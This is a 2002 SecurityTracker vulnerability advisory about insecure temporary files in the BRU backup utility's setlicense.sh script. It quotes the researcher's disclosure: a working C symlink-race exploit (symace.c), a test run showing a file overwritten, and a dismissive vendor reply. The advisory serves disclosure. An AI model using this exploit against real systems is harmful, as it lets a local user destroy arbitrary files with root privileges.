SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   BRU Vendors:   TOLIS Group, Inc.
BRU Backup Utility Has Temporary File Symlink Bug That Lets Local Users Overwrite Any File on the System
SecurityTracker Alert ID:  1003381
SecurityTracker URL:  http://securitytracker.com/id/1003381
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 28 2002
Impact:   Denial of service via local system, Modification of system information, Modification of user information
Exploit Included:  Yes  

Description:   A vulnerability was reported in the BRU file backup application. A local user can overwrite any file on the system.

It is reported that BRU creates unsafe temporary files with a predictable filename based on the process id (pid) of the 'setlicense.sh' script. A local user can create a symbolic link from the predicted temporary file name to another critical file on the system. Then, when the BRU utility is executed (by a root user, as would be normal), the linked file will be overwritten with the text 'foobar' with root level privileges.

A demonstration exploit is provided in the Source Message.
Impact:   A local unprivileged user can cause any file on the system to be overwritten.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tolisgroup.com/bru3.html (Links to External Site)
Cause:   Access control error, State error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents
Date:  Sat, 26 Jan 2002 21:00:55 +1100 (EST)
Subject:  bru backup program


Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers options 
for most conceivable data backup and  recovery  needs.  BRU is fully device 
independent, so it works with any device or filesystem that  is  supported by 
your operating system.  Verification is performed automatically with BRU's 
Autoscan feature and can also be performed  days,  weeks, or even years after 
a backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts, which allows
you to overwrite arbitrary files with foobar. Since this script would most 
likely be run by root, it allows you to overwrite any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who don't know,
$$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic links in the
temp directory pointing to the file you want to overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com)    */

int main(int argc, char **argv)
{
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
}

Vendor Respone:
---------------

This doesn't make much sense to me, exploiting your own system while you are already root? Correct me if I am wrong but this doesn't
 make much sense to me. 

--Mike
BRU Support Team 
The TOLIS Group - http://www.tolisgroup.com 
support@tolisgroup.com 

I think he didn't like my example down there. Everyone else on the list should be able to understand it without the need for a # sign...


Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist.  BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$




--
www.tasmail.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC